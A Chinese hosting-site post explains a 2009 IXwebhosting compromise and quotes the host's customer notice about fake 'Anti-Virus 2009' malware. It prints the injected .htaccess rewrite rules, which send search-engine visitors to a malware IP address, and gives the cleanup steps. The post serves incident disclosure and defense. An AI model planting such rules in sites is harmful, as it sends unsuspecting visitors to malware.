关于IXwebhosting上出现的安全问题
![]() | ![]() | ![]() | ![]() |
| 【性价之王】 | 【线路之王】 | 【价格之王】 | 【配置之王】 |
| 【免费之王】 | 【香港首推】 | 【梯子之王】 | 【独服之王】 |
症状:直接进入网站没有问题,从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看: http://bbs.idcspy.com/thread-36706-1-1.html
原因: 网站的.htaccess文件被修改,会加入如下代码:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向
解决方法: 修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。
来自IXwebhosting官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件。
下面是ixwebhosting关于此问题发给用户的信件:
In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.
We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.
While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:
1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ … tall-antivirus-2009
2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.
To illustrate the severity of the issue I would like to share some facts with you:
* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system
We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.
If you have questions regarding any of this information, please contact our support team anytime.
Kind Regards,
Fatima Said, CCO
IX Web Hosting
猜你可能想看的VPS
- racknerd→$159 月 洛杉矶 纽约 100T 大流量独立服务器独立服务器[U]
- Worria→$60 月-E3 1230v2 8GB 1TB 2IP 1日本VPS[主机]
- Uovz→2200 元 月 E5-2620*2 16GB 内存 240G全球[VPS测评]
- 搬瓦工最便宜的 cn2vps 补货,10Gbps 大带宽服务器,46.8全球[VPS测评]
- Bootstrap-table 获取选中行数据全球[VPS测评]
- 偏贵-GeorgeDatacenter→$7 月 32GB 内存 60G虚拟空间(主机)
- 二月返场 JGKVM 优惠→香港 CMI 大带宽全场 8 折优惠 年付立香港VPS[主机]
- 不限内容大盘机 $38.5 年 1G 内存 1T 硬盘 10TB@1Gb全球[VPS测评]
- 促销 DCNHost→分销主机$49 年 800G 空间 不限流量 不限虚拟空间(主机)
- 国内做站必备备案快 腾讯云秒杀→1 核 2G 50G 1M 年付 99 全球[VPS测评]
- 腾讯云采购季→个人云服务器年付 99 元起 企业云服务器 2C4G3M 全球[VPS测评]
- 搬瓦工VPS补货DC9 CN2 GIA限量促销年付39.99美金套餐全球[VPS测评]
- SoftShellWeb 黑五促销 中国台湾大陆优化线路 1g内存 带5全球[VPS测评]
- WordPress免插件代码实现Gravatar头像缓存全球[VPS测评]
- WordPress网站运营必备的浏览器插件5118站长工具箱全球[VPS测评]
- hostodo美国便宜VPS,1.5G内存,8T超大流量,1Gbps带宽美国VPS[主机]
- PacificRack → 512M 25G SSD 500G $12.全球[VPS测评]
- SEO和网页加载速度有关系吗?如何提升?全球[VPS测评]
- 中行升级服务力促跨境电商发展全球[VPS测评]
- 性价比最高的VPS网络评测全球[VPS测评]
- EdgeNat双十二优惠:韩国/香港/美国全场VPS年付,2核2G2M仅韩国VPS[主机]
- 拼多多也要做跨境电商?出海之路能一帆风顺吗,了解一下全球[VPS测评]
- 青叶云怎么样?青叶云国内/国外弹性云服务器价格,海外vps低至25.6元全球[VPS测评]
- 轻云互联,香港VPS月付22元 美国VPS月付19元美国VPS[主机]
- 2020年国外VPS哪个最好?教你学会选择国外VPS全球[VPS测评]
- 持续高温!长沙所有初中新生停止军训!全球[VPS测评]
- 衡天云:香港/美国云服务器_1核2G首年301元起;海外虚拟主机低至15美国VPS[主机]
- 茶猫云:香港云服务器,支持windows,2M带宽,34元/月WINDOWS
- 云计算拯救互联网巨头?全球[VPS测评]
- 无忧云:雅安/德阳100G高防云主机月付78元起,香港CN2云服务器月付香港VPS[主机]
转载请注明原文地址:http://140.238.13.167:12355/read-79738.html











